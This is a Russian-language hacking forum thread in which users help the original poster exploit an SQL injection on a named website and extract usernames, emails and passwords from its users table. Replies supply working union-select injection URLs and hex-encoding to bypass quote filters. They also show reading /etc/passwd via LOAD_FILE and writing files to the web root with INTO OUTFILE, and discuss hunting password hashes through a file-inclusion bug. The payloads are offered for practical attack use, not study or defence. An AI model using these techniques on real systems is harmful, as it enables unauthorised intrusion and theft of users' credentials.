![]() |
Как быть?(MySQL)
Вообщем всем привет, есть пару вопросов очень надеюсь на вашу помощь…
Имеем к примеру SQL-inj на сайте типа: bagsql.ru/index.php?id=-1+union+select+1,2,3/* Выводится 2-ечка, есть возможность посмотреть VERSION() USER() и т.д, но фильтруются символы, пробовал CHAR() текст выводится , но вопрос заключается в том что я 100% уверен что там есть таблица users в которой присутствуют usid, email, usname, uspwd дак вот составляя такой вот запрос: bagsql.ru/index.php?id=-1+union+select+1,usname,3+from+users/* Получаю ошибку… Мне кажется что это из-за фильтра… хотя хз… Посоветуйте как быть, PlizZZe. Ещё возник один вопросик, если я не могу выполнить LOAD_FILE() //пробовал даже кодировать через CHAR(), то выполнится ли OUTFILE? И можно ли тоже использовать кодирование? И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути. //Слышал что можно в логах нарыть пассы, реально ли? Всем спасибо, кто чем поможет, с меня репа. |
Код:
http://www.bagsql.ru/index.php?id=-1+union+select+1,concat_ws(0x3b,usid,email,usname,uspwd)+from+mysql.users+limit+1,1/* |
Isis, concat_ws(0x3b,usid,email,usname, uspwd) и mysql.users O_o :-| ?
|
2 автор: может ссылку норм дашь? :)
Цитата:
может проблема в кодировке? bagsql.ru/index.php?id=-1+union+select+1,convert(usname+using+cp1251),3+fr om+users/*] вместо cp1251 - кодировка. |
либо поуниверсальнее можешь ввести
bagsql.ru/index.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usname,0x 55),0x55),3+from+users/* или как nitrox говорит. |
Цитата:
|
Ссылку в студию. Sql иньекция- такая вещь, с которй надо работать на месте, разбиратся с конкретным случаем
|
Isis насчет кавчек бред =))
если есть файл прив, то нас спасает кодирование в base64 то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764) также поступаем во всех местах где юзаются кавычки.. например запрос .. ./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/* опять же admin = 61 64 6d 69 6e ./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/* и тд.. |
Цитата:
Например Код:
select+1,2+from+mysql.users+into+outfile+'/home/usr1/www/'/* |
Какой еще бэйсшиссятчитыре , это хекс :)
|
| Время: 02:02 |